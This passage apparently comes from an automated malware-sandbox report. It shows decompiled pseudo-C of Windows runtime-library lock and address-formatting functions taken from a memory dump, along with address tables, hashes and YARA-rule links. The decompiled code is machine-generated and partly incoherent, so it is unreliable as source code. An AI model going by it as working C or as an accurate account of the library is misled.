								__eflags = _t51;
								if(__eflags < 0) {
									_push(_t51);
									L00963915(_t96, _t106, _t118, _t130, _t144, __eflags);
									asm("int3");
									while(1) {
										L32:
										__eflags = _a8;
										if(_a8 == 0) {
											break;
										}
										 *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) =  *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) + 1;
										_t119 = _t96 + 0x24;
										_t107 = 1;
										asm("lock xadd [eax], ecx");
										_t56 =  *(_t96 + 0x28);
										_a4 = _t56;
										__eflags = _t56;
										if(_t56 != 0) {
											L40:
											_t128 = 0;
											__eflags = 0;
											while(1) {
												_t121 =  *(_t96 + 0x30) & 0x00000001;
												asm("sbb esi, esi");
												_t138 =  !( ~( *(_t96 + 0x30) & 1)) & 0x00a001c0;
												_push(_t138);
												_push(0);
												_t58 = E0091F8CC( *((intOrPtr*)(_t96 + 0x20)));
												__eflags = _t58 - 0x102;
												if(_t58 != 0x102) {
													break;
												}
												_t107 =  *(_t138 + 4);
												_t125 =  *_t138;
												_t75 = L00964FC0(_t125, _t107, 0xff676980, 0xffffffff);
												_push(_t125);
												_push(_t75);
												L00973F92(0x65, 0, "RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)\n", _t128);
												L00973F92(0x65, 0, "RTL: Resource at %p\n", _t96);
												_t128 = _t128 + 1;
												_t159 = _t158 + 0x28;
												__eflags = _t128 - 2;
												if(__eflags > 0) {
													E009A217A(_t107, __eflags, _t96);
												}
												_push("RTL: Re-Waiting\n");
												_push(0);
												_push(0x65);
												L00973F92();
												_t158 = _t159 + 0xc;
											}
											__eflags = _t58;
											if(__eflags < 0) {
												_push(_t58);
												L00963915(_t96, _t107, _t121, _t128, _t138, __eflags);
												asm("int3");
												_t61 =  *_t107;
												 *_t107 = 0;
												__eflags = _t61;
												if(_t61 == 0) {
													L1:
													_t63 = E00945384(_t138 + 0x24);
													if(_t63 != 0) {
														goto L52;
													} else {
														goto L2;
													}
												} else {
													_t123 =  *((intOrPtr*)(_t138 + 0x18));
													_push( &_a4);
													_push(_t61);
													_t70 = L0091F970( *((intOrPtr*)(_t138 + 0x18)));
													__eflags = _t70;
													if(__eflags >= 0) {
														goto L1;
													} else {
														_push(_t70);
														L00963915(_t96,  &_a4, _t123, _t128, _t138, __eflags);
														L52:
														_t122 =  *((intOrPtr*)(_t138 + 0x20));
														_push( &_a4);
														_push(1);
														_t63 = L0091F970( *((intOrPtr*)(_t138 + 0x20)));
														__eflags = _t63;
														if(__eflags >= 0) {
															L2:
															return _t63;
														} else {
															_push(_t63);
															L00963915(_t96,  &_a4, _t122, _t128, _t138, __eflags);
															_t109 =  *((intOrPtr*)(_t138 + 0x20));
															_push( &_a4);
															_push(1);
															_t63 = L0091F970( *((intOrPtr*)(_t138 + 0x20)));
															__eflags = _t63;
															if(__eflags >= 0) {
																goto L2;
															} else {
																_push(_t63);
																_t66 = L00963915(_t96, _t109, _t122, _t128, _t138, __eflags);
																asm("int3");
																while(1) {
																	_t110 = _t66;
																	__eflags = _t66 - 1;
																	if(_t66 != 1) {
																		break;
																	}
																	_t128 = _t128 | 0xffffffff;
																	_t66 = _t110;
																	asm("lock cmpxchg [ebx], edi");
																	__eflags = _t66 - _t110;
																	if(_t66 != _t110) {
																		continue;
																	} else {
																		_t67 =  *[fs:0x18];
																		 *((intOrPtr*)(_t138 + 0x2c)) =  *((intOrPtr*)(_t67 + 0x24));
																		return _t67;
																	}
																	goto L59;
																}
																E00945329(_t110, _t138);
																_t69 = E009453A5(_t138, 1);
																return _t69;
															}
														}
													}
												}
											} else {
												_t56 =  *(_t96 + 0x28);
												goto L3;
											}
										} else {
											_t107 =  *_t119;
											__eflags = _t107;
											if(__eflags > 0) {
												while(1) {
													_t81 = _t107;
													asm("lock cmpxchg [edi], esi");
													__eflags = _t81 - _t107;
													if(_t81 == _t107) {
														break;
													}
													_t107 = _t81;
													__eflags = _t81;
													if(_t81 > 0) {
														continue;
													}
													break;
												}
												_t56 = _a4;
												__eflags = _t107;
											}
											if(__eflags != 0) {
												while(1) {
													L3:
													__eflags = _t56;
													if(_t56 != 0) {
														goto L32;
													}
													_t107 = _t107 | 0xffffffff;
													_t56 = 0;
													asm("lock cmpxchg [edx], ecx");
													__eflags = 0;
													if(0 != 0) {
														continue;
													} else {
														 *((intOrPtr*)(_t96 + 0x2c)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
														return 1;
													}
													goto L59;
												}
												continue;
											} else {
												goto L40;
											}
										}
										goto L59;
									}
									__eflags = 0;
									return 0;
								} else {
									_t115 =  *(_t96 + 0x28);
									continue;
								}
							} else {
								_t106 =  *_t49;
								__eflags = _t106;
								if(__eflags > 0) {
									while(1) {
										_t93 = _t106;
										asm("lock cmpxchg [edi], esi");
										__eflags = _t93 - _t106;
										if(_t93 == _t106) {
											break;
										}
										_t106 = _t93;
										__eflags = _t93;
										if(_t93 > 0) {
											continue;
										}
										break;
									}
									__eflags = _t106;
								}
								if(__eflags != 0) {
									continue;
								} else {
									goto L23;
								}
							}
						}
						goto L59;
					}
					_t84 = _t115;
					asm("lock cmpxchg [esi], ecx");
					__eflags = _t84 - _t115;
					if(_t84 != _t115) {
						_t115 = _t84;
						goto L7;
					} else {
						return 1;
					}
				}
				L59:
			}




































                                                                                                                                                    0x0096055a
                                                                                                                                                    0x0096055d
                                                                                                                                                    0x00960563
                                                                                                                                                    0x00960566
                                                                                                                                                    0x009605d8
                                                                                                                                                    0x009605e2
                                                                                                                                                    0x009605e5
                                                                                                                                                    0x00000000
                                                                                                                                                    0x009605e7
                                                                                                                                                    0x009605e7
                                                                                                                                                    0x009605ea
                                                                                                                                                    0x009605f3
                                                                                                                                                    0x009605f3
                                                                                                                                                    0x00960568
                                                                                                                                                    0x00960568
                                                                                                                                                    0x00960568
                                                                                                                                                    0x00960569
                                                                                                                                                    0x00960569
                                                                                                                                                    0x00960569
                                                                                                                                                    0x0096056b
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0098217f
                                                                                                                                                    0x00982183
                                                                                                                                                    0x0098225b
                                                                                                                                                    0x0098225f
                                                                                                                                                    0x00982189
                                                                                                                                                    0x0098218c
                                                                                                                                                    0x0098218f
                                                                                                                                                    0x00982194
                                                                                                                                                    0x00982199
                                                                                                                                                    0x0098219d
                                                                                                                                                    0x009821a0
                                                                                                                                                    0x009821a2
                                                                                                                                                    0x009821ce
                                                                                                                                                    0x009821ce
                                                                                                                                                    0x009821ce
                                                                                                                                                    0x009821d0
                                                                                                                                                    0x009821d6
                                                                                                                                                    0x009821de
                                                                                                                                                    0x009821e2
                                                                                                                                                    0x009821e8
                                                                                                                                                    0x009821e9
                                                                                                                                                    0x009821ec
                                                                                                                                                    0x009821f1
                                                                                                                                                    0x009821f6
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x009821f8
                                                                                                                                                    0x009821fb
                                                                                                                                                    0x00982206
                                                                                                                                                    0x0098220b
                                                                                                                                                    0x0098220c
                                                                                                                                                    0x00982217
                                                                                                                                                    0x00982226
                                                                                                                                                    0x0098222b
                                                                                                                                                    0x0098222c
                                                                                                                                                    0x0098222f
                                                                                                                                                    0x00982232
                                                                                                                                                    0x00982235
                                                                                                                                                    0x00982235
                                                                                                                                                    0x0098223a
                                                                                                                                                    0x0098223f
                                                                                                                                                    0x00982241
                                                                                                                                                    0x00982243
                                                                                                                                                    0x00982248
                                                                                                                                                    0x00982248
                                                                                                                                                    0x0098224d
                                                                                                                                                    0x0098224f
                                                                                                                                                    0x00982262
                                                                                                                                                    0x00982263
                                                                                                                                                    0x00982268
                                                                                                                                                    0x00982269
                                                                                                                                                    0x00982269
                                                                                                                                                    0x00982269
                                                                                                                                                    0x0098226d
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00982276
                                                                                                                                                    0x00982279
                                                                                                                                                    0x0098227e
                                                                                                                                                    0x00982283
                                                                                                                                                    0x00982287
                                                                                                                                                    0x0098228a
                                                                                                                                                    0x0098228d
                                                                                                                                                    0x0098228f
                                                                                                                                                    0x009822bc
                                                                                                                                                    0x009822bc
                                                                                                                                                    0x009822bc
                                                                                                                                                    0x009822be
                                                                                                                                                    0x009822c4
                                                                                                                                                    0x009822cc
                                                                                                                                                    0x009822d0
                                                                                                                                                    0x009822d6
                                                                                                                                                    0x009822d7
                                                                                                                                                    0x009822da
                                                                                                                                                    0x009822df
                                                                                                                                                    0x009822e4
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x009822e6
                                                                                                                                                    0x009822e9
                                                                                                                                                    0x009822f4
                                                                                                                                                    0x009822f9
                                                                                                                                                    0x009822fa
                                                                                                                                                    0x00982305
                                                                                                                                                    0x00982314
                                                                                                                                                    0x00982319
                                                                                                                                                    0x0098231a
                                                                                                                                                    0x0098231d
                                                                                                                                                    0x00982320
                                                                                                                                                    0x00982323
                                                                                                                                                    0x00982323
                                                                                                                                                    0x00982328
                                                                                                                                                    0x0098232d
                                                                                                                                                    0x0098232f
                                                                                                                                                    0x00982331
                                                                                                                                                    0x00982336
                                                                                                                                                    0x00982336
                                                                                                                                                    0x0098233b
                                                                                                                                                    0x0098233d
                                                                                                                                                    0x00982350
                                                                                                                                                    0x00982351
                                                                                                                                                    0x00982356
                                                                                                                                                    0x00982359
                                                                                                                                                    0x00982359
                                                                                                                                                    0x0098235b
                                                                                                                                                    0x0098235d
                                                                                                                                                    0x00945367
                                                                                                                                                    0x0094536b
                                                                                                                                                    0x00945372
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00982363
                                                                                                                                                    0x00982363
                                                                                                                                                    0x00982369
                                                                                                                                                    0x0098236a
                                                                                                                                                    0x0098236c
                                                                                                                                                    0x00982371
                                                                                                                                                    0x00982373
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00982379
                                                                                                                                                    0x00982379
                                                                                                                                                    0x0098237a
                                                                                                                                                    0x0098237f
                                                                                                                                                    0x0098237f
                                                                                                                                                    0x00982385
                                                                                                                                                    0x00982386
                                                                                                                                                    0x00982389
                                                                                                                                                    0x0098238e
                                                                                                                                                    0x00982390
                                                                                                                                                    0x00945378
                                                                                                                                                    0x0094537c
                                                                                                                                                    0x00982396
                                                                                                                                                    0x00982396
                                                                                                                                                    0x00982397
                                                                                                                                                    0x0098239c
                                                                                                                                                    0x009823a2
                                                                                                                                                    0x009823a3
                                                                                                                                                    0x009823a6
                                                                                                                                                    0x009823ab
                                                                                                                                                    0x009823ad
                                                                                                                                                    0x00000000
                                                                                                                                                    0x009823b3
                                                                                                                                                    0x009823b3
                                                                                                                                                    0x009823b4
                                                                                                                                                    0x009823b9
                                                                                                                                                    0x009823ba
                                                                                                                                                    0x009823ba
                                                                                                                                                    0x009823bc
                                                                                                                                                    0x009823bf
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00979153
                                                                                                                                                    0x00979158
                                                                                                                                                    0x0097915a
                                                                                                                                                    0x0097915e
                                                                                                                                                    0x00979160
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00979166
                                                                                                                                                    0x00979166
                                                                                                                                                    0x00979171
                                                                                                                                                    0x00979176
                                                                                                                                                    0x00979176
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00979160
                                                                                                                                                    0x009823c6
                                                                                                                                                    0x009823ce
                                                                                                                                                    0x009823d7
                                                                                                                                                    0x009823d7
                                                                                                                                                    0x009823ad
                                                                                                                                                    0x00982390
                                                                                                                                                    0x00982373
                                                                                                                                                    0x0098233f
                                                                                                                                                    0x0098233f
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0098233f
                                                                                                                                                    0x00982291
                                                                                                                                                    0x00982291
                                                                                                                                                    0x00982293
                                                                                                                                                    0x00982295
                                                                                                                                                    0x0098229a
                                                                                                                                                    0x009822a1
                                                                                                                                                    0x009822a3
                                                                                                                                                    0x009822a7
                                                                                                                                                    0x009822a9
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x009822ab
                                                                                                                                                    0x009822ad
                                                                                                                                                    0x009822af
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x009822af
                                                                                                                                                    0x009822b1
                                                                                                                                                    0x009822b4
                                                                                                                                                    0x009822b4
                                                                                                                                                    0x009822b6
                                                                                                                                                    0x009453be
                                                                                                                                                    0x009453be
                                                                                                                                                    0x009453be
                                                                                                                                                    0x009453c0
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x009453cb
                                                                                                                                                    0x009453ce
                                                                                                                                                    0x009453d0
                                                                                                                                                    0x009453d4
                                                                                                                                                    0x009453d6
                                                                                                                                                    0x00000000
                                                                                                                                                    0x009453d8
                                                                                                                                                    0x009453e3
                                                                                                                                                    0x009453ea
                                                                                                                                                    0x009453ea
                                                                                                                                                    0x00000000
                                                                                                                                                    0x009453d6
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x009822b6
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0098228f
                                                                                                                                                    0x00982349
                                                                                                                                                    0x0098234d
                                                                                                                                                    0x00982251
                                                                                                                                                    0x00982251
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00982251
                                                                                                                                                    0x009821a4
                                                                                                                                                    0x009821a4
                                                                                                                                                    0x009821a6
                                                                                                                                                    0x009821a8
                                                                                                                                                    0x009821ac
                                                                                                                                                    0x009821b6
                                                                                                                                                    0x009821b8
                                                                                                                                                    0x009821bc
                                                                                                                                                    0x009821be
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x009821c0
                                                                                                                                                    0x009821c2
                                                                                                                                                    0x009821c4
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x009821c4
                                                                                                                                                    0x009821c6
                                                                                                                                                    0x009821c6
                                                                                                                                                    0x009821c8
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x009821c8
                                                                                                                                                    0x009821a2
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00982183
                                                                                                                                                    0x0096057b
                                                                                                                                                    0x0096057d
                                                                                                                                                    0x00960581
                                                                                                                                                    0x00960583
                                                                                                                                                    0x00982178
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00960589
                                                                                                                                                    0x0096058f
                                                                                                                                                    0x0096058f
                                                                                                                                                    0x00960583
                                                                                                                                                    0x00000000

                                                                                                                                                    APIs
                                                                                                                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00982206
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000007.00000002.2246637446.0000000000910000.00000040.00000001.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                    • Associated: 00000007.00000002.2246630642.0000000000900000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000007.00000002.2246724865.00000000009F0000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000007.00000002.2246731757.0000000000A00000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000007.00000002.2246739338.0000000000A04000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000007.00000002.2246746087.0000000000A07000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000007.00000002.2246752065.0000000000A10000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000007.00000002.2246784838.0000000000A70000.00000040.00000001.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                                                                    • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                                                                                    • API String ID: 885266447-4236105082
                                                                                                                                                    • Opcode ID: 59f08a282faa4c420f0fc9b4342fa4342a06c891dca7008669db12de88f9d778
                                                                                                                                                    • Instruction ID: e85e9dc92339a425259b72e858c77936d78bd0037adfea23ab8281069589f657
                                                                                                                                                    • Opcode Fuzzy Hash: 59f08a282faa4c420f0fc9b4342fa4342a06c891dca7008669db12de88f9d778
                                                                                                                                                    • Instruction Fuzzy Hash: 2F5138317042156FEB14DB18DCC2FA633ADABD4720F218269FC59DB385D975EC418B90
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 009614C0, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 91COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 64%
                                                                                                                                                    			E009614C0(void* __ecx, void* __edx, intOrPtr* _a4, intOrPtr _a8, signed int _a12, intOrPtr _a16, intOrPtr* _a20) {
				signed int _v8;
				char _v10;
				char _v140;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t24;
				void* _t26;
				signed int _t29;
				signed int _t34;
				signed int _t40;
				intOrPtr _t45;
				void* _t51;
				intOrPtr* _t52;
				void* _t54;
				signed int _t57;
				void* _t58;

				_t51 = __edx;
				_t24 =  *0xa02088; // 0x7745a8fa
				_v8 = _t24 ^ _t57;
				_t45 = _a16;
				_t53 = _a4;
				_t52 = _a20;
				if(_a4 == 0 || _t52 == 0) {
					L10:
					_t26 = 0xc000000d;
				} else {
					if(_t45 == 0) {
						if( *_t52 == _t45) {
							goto L3;
						} else {
							goto L10;
						}
					} else {
						L3:
						_t28 =  &_v140;
						if(_a12 != 0) {
							_push("[");
							_push(0x41);
							_push( &_v140);
							_t29 = E00957707();
							_t58 = _t58 + 0xc;
							_t28 = _t57 + _t29 * 2 - 0x88;
						}
						_t54 = E009613CB(_t53, _t28);
						if(_a8 != 0) {
							_t34 = E00957707(_t54,  &_v10 - _t54 >> 1, L"%%%u", _a8);
							_t58 = _t58 + 0x10;
							_t54 = _t54 + _t34 * 2;
						}
						if(_a12 != 0) {
							_t40 = E00957707(_t54,  &_v10 - _t54 >> 1, L"]:%u", _a12 & 0x0000ffff);
							_t58 = _t58 + 0x10;
							_t54 = _t54 + _t40 * 2;
						}
						_t53 = (_t54 -  &_v140 >> 1) + 1;
						 *_t52 = _t53;
						if( *_t52 < _t53) {
							goto L10;
						} else {
							E00922340(_t45,  &_v140, _t53 + _t53);
							_t26 = 0;
						}
					}
				}
				return E0092E1B4(_t26, _t45, _v8 ^ _t57, _t51, _t52, _t53);
			}




















                                                                                                                                                    0x009614c0
                                                                                                                                                    0x009614cb
                                                                                                                                                    0x009614d2
                                                                                                                                                    0x009614d6
                                                                                                                                                    0x009614da
                                                                                                                                                    0x009614de
                                                                                                                                                    0x009614e3
                                                                                                                                                    0x0096157a
                                                                                                                                                    0x0096157a
                                                                                                                                                    0x009614f1
                                                                                                                                                    0x009614f3
                                                                                                                                                    0x0098ea0f
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0098ea15
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0098ea15
                                                                                                                                                    0x009614f9
                                                                                                                                                    0x009614f9
                                                                                                                                                    0x009614fe
                                                                                                                                                    0x00961504
                                                                                                                                                    0x0098ea1a
                                                                                                                                                    0x0098ea1f
                                                                                                                                                    0x0098ea21
                                                                                                                                                    0x0098ea22
                                                                                                                                                    0x0098ea27
                                                                                                                                                    0x0098ea2a
                                                                                                                                                    0x0098ea2a
                                                                                                                                                    0x00961515
                                                                                                                                                    0x00961517
                                                                                                                                                    0x0096156d
                                                                                                                                                    0x00961572
                                                                                                                                                    0x00961575
                                                                                                                                                    0x00961575
                                                                                                                                                    0x0096151e
                                                                                                                                                    0x0098ea50
                                                                                                                                                    0x0098ea55
                                                                                                                                                    0x0098ea58
                                                                                                                                                    0x0098ea58
                                                                                                                                                    0x0096152e
                                                                                                                                                    0x00961531
                                                                                                                                                    0x00961533
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00961535
                                                                                                                                                    0x00961541
                                                                                                                                                    0x00961549
                                                                                                                                                    0x00961549
                                                                                                                                                    0x00961533
                                                                                                                                                    0x009614f3
                                                                                                                                                    0x00961559

                                                                                                                                                    APIs
                                                                                                                                                    • ___swprintf_l.LIBCMT ref: 0098EA22
                                                                                                                                                      • Part of subcall function 009613CB: ___swprintf_l.LIBCMT ref: 0096146B
                                                                                                                                                      • Part of subcall function 009613CB: ___swprintf_l.LIBCMT ref: 00961490
                                                                                                                                                    • ___swprintf_l.LIBCMT ref: 0096156D
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000007.00000002.2246637446.0000000000910000.00000040.00000001.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                    • Associated: 00000007.00000002.2246630642.0000000000900000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000007.00000002.2246724865.00000000009F0000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000007.00000002.2246731757.0000000000A00000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000007.00000002.2246739338.0000000000A04000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000007.00000002.2246746087.0000000000A07000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000007.00000002.2246752065.0000000000A10000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000007.00000002.2246784838.0000000000A70000.00000040.00000001.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ___swprintf_l
                                                                                                                                                    • String ID: %%%u$]:%u
                                                                                                                                                    • API String ID: 48624451-3050659472
                                                                                                                                                    • Opcode ID: 1c844c141e130c84103369c93898b7f855893a66e8cc0142b8507b627a662c3f
                                                                                                                                                    • Instruction ID: 36043da76b819bdf085d6c046f88818ee0ace6942009f231e6a4d3b21182b3c8
                                                                                                                                                    • Opcode Fuzzy Hash: 1c844c141e130c84103369c93898b7f855893a66e8cc0142b8507b627a662c3f
                                                                                                                                                    • Instruction Fuzzy Hash: 9A21A5729002299FCF21EE54DC45AEEB3ACAB94700F484555FC47D3241DB74EE588BE1
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 009453A5, Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 185COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 45%
                                                                                                                                                    			E009453A5(signed int _a4, char _a8) {
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t32;
				signed int _t37;
				signed int _t40;
				signed int _t42;
				void* _t45;
				intOrPtr _t46;
				void* _t48;
				signed int _t49;
				void* _t51;
				signed int _t57;
				signed int _t64;
				signed int _t71;
				void* _t74;
				intOrPtr _t78;
				signed int* _t79;
				void* _t85;
				signed int _t86;
				signed int _t92;
				void* _t104;
				void* _t105;

				_t64 = _a4;
				_t32 =  *(_t64 + 0x28);
				_t71 = _t64 + 0x28;
				_push(_t92);
				if(_t32 < 0) {
					_t78 =  *[fs:0x18];
					__eflags =  *((intOrPtr*)(_t64 + 0x2c)) -  *((intOrPtr*)(_t78 + 0x24));
					if( *((intOrPtr*)(_t64 + 0x2c)) !=  *((intOrPtr*)(_t78 + 0x24))) {
						goto L3;
					} else {
						__eflags = _t32 | 0xffffffff;
						asm("lock xadd [ecx], eax");
						return 1;
					}
				} else {
					L3:
					_push(_t86);
					while(1) {
						L4:
						__eflags = _t32;
						if(_t32 == 0) {
							break;
						}
						__eflags = _a8;
						if(_a8 == 0) {
							__eflags = 0;
							return 0;
						} else {
							 *((intOrPtr*)( *((intOrPtr*)(_t64 + 0x34)) + 0x14)) =  *((intOrPtr*)( *((intOrPtr*)(_t64 + 0x34)) + 0x14)) + 1;
							_t79 = _t64 + 0x24;
							_t71 = 1;
							asm("lock xadd [eax], ecx");
							_t32 =  *(_t64 + 0x28);
							_a4 = _t32;
							__eflags = _t32;
							if(_t32 != 0) {
								L19:
								_t86 = 0;
								__eflags = 0;
								while(1) {
									_t81 =  *(_t64 + 0x30) & 0x00000001;
									asm("sbb esi, esi");
									_t92 =  !( ~( *(_t64 + 0x30) & 1)) & 0x00a001c0;
									_push(_t92);
									_push(0);
									_t37 = E0091F8CC( *((intOrPtr*)(_t64 + 0x20)));
									__eflags = _t37 - 0x102;
									if(_t37 != 0x102) {
										break;
									}
									_t71 =  *(_t92 + 4);
									_t85 =  *_t92;
									_t51 = L00964FC0(_t85, _t71, 0xff676980, 0xffffffff);
									_push(_t85);
									_push(_t51);
									L00973F92(0x65, 0, "RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)\n", _t86);
									L00973F92(0x65, 0, "RTL: Resource at %p\n", _t64);
									_t86 = _t86 + 1;
									_t105 = _t104 + 0x28;
									__eflags = _t86 - 2;
									if(__eflags > 0) {
										E009A217A(_t71, __eflags, _t64);
									}
									_push("RTL: Re-Waiting\n");
									_push(0);
									_push(0x65);
									L00973F92();
									_t104 = _t105 + 0xc;
								}
								__eflags = _t37;
								if(__eflags < 0) {
									_push(_t37);
									L00963915(_t64, _t71, _t81, _t86, _t92, __eflags);
									asm("int3");
									_t40 =  *_t71;
									 *_t71 = 0;
									__eflags = _t40;
									if(_t40 == 0) {
										L1:
										_t42 = E00945384(_t92 + 0x24);
										if(_t42 != 0) {
											goto L31;
										} else {
											goto L2;
										}
									} else {
										_t83 =  *((intOrPtr*)(_t92 + 0x18));
										_push( &_a4);
										_push(_t40);
										_t49 = L0091F970( *((intOrPtr*)(_t92 + 0x18)));
										__eflags = _t49;
										if(__eflags >= 0) {
											goto L1;
										} else {
											_push(_t49);
											L00963915(_t64,  &_a4, _t83, _t86, _t92, __eflags);
											L31:
											_t82 =  *((intOrPtr*)(_t92 + 0x20));
											_push( &_a4);
											_push(1);
											_t42 = L0091F970( *((intOrPtr*)(_t92 + 0x20)));
											__eflags = _t42;
											if(__eflags >= 0) {
												L2:
												return _t42;
											} else {
												_push(_t42);
												L00963915(_t64,  &_a4, _t82, _t86, _t92, __eflags);
												_t73 =  *((intOrPtr*)(_t92 + 0x20));
												_push( &_a4);
												_push(1);
												_t42 = L0091F970( *((intOrPtr*)(_t92 + 0x20)));
												__eflags = _t42;
												if(__eflags >= 0) {
													goto L2;
												} else {
													_push(_t42);
													_t45 = L00963915(_t64, _t73, _t82, _t86, _t92, __eflags);
													asm("int3");
													while(1) {
														_t74 = _t45;
														__eflags = _t45 - 1;
														if(_t45 != 1) {
															break;
														}
														_t86 = _t86 | 0xffffffff;
														_t45 = _t74;
														asm("lock cmpxchg [ebx], edi");
														__eflags = _t45 - _t74;
														if(_t45 != _t74) {
															continue;
														} else {
															_t46 =  *[fs:0x18];
															 *((intOrPtr*)(_t92 + 0x2c)) =  *((intOrPtr*)(_t46 + 0x24));
															return _t46;
														}
														goto L38;
													}
													E00945329(_t74, _t92);
													_push(1);
													_t48 = E009453A5(_t92);
													return _t48;
												}
											}
										}
									}
								} else {
									_t32 =  *(_t64 + 0x28);
									continue;
								}
							} else {
								_t71 =  *_t79;
								__eflags = _t71;
								if(__eflags > 0) {
									while(1) {
										_t57 = _t71;
										asm("lock cmpxchg [edi], esi");
										__eflags = _t57 - _t71;
										if(_t57 == _t71) {
											break;
										}
										_t71 = _t57;
										__eflags = _t57;
										if(_t57 > 0) {
											continue;
										}
										break;
									}
									_t32 = _a4;
									__eflags = _t71;
								}
								if(__eflags != 0) {
									continue;
								} else {
									goto L19;
								}
							}
						}
						goto L38;
					}
					_t71 = _t71 | 0xffffffff;
					_t32 = 0;
					asm("lock cmpxchg [edx], ecx");
					__eflags = 0;
					if(0 != 0) {
						goto L4;
					} else {
						 *((intOrPtr*)(_t64 + 0x2c)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
						return 1;
					}
				}
				L38:
			}


























                                                                                                                                                    0x009453ab
                                                                                                                                                    0x009453ae
                                                                                                                                                    0x009453b1
                                                                                                                                                    0x009453b4
                                                                                                                                                    0x009453b7
                                                                                                                                                    0x009605b6
                                                                                                                                                    0x009605c0
                                                                                                                                                    0x009605c3
                                                                                                                                                    0x00000000
                                                                                                                                                    0x009605c9
                                                                                                                                                    0x009605c9
                                                                                                                                                    0x009605cc
                                                                                                                                                    0x009605d5
                                                                                                                                                    0x009605d5
                                                                                                                                                    0x009453bd
                                                                                                                                                    0x009453bd
                                                                                                                                                    0x009453bd
                                                                                                                                                    0x009453be
                                                                                                                                                    0x009453be
                                                                                                                                                    0x009453be
                                                                                                                                                    0x009453c0
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00982269
                                                                                                                                                    0x0098226d
                                                                                                                                                    0x00982349
                                                                                                                                                    0x0098234d
                                                                                                                                                    0x00982273
                                                                                                                                                    0x00982276
                                                                                                                                                    0x00982279
                                                                                                                                                    0x0098227e
                                                                                                                                                    0x00982283
                                                                                                                                                    0x00982287
                                                                                                                                                    0x0098228a
                                                                                                                                                    0x0098228d
                                                                                                                                                    0x0098228f
                                                                                                                                                    0x009822bc
                                                                                                                                                    0x009822bc
                                                                                                                                                    0x009822bc
                                                                                                                                                    0x009822be
                                                                                                                                                    0x009822c4
                                                                                                                                                    0x009822cc
                                                                                                                                                    0x009822d0
                                                                                                                                                    0x009822d6
                                                                                                                                                    0x009822d7
                                                                                                                                                    0x009822da
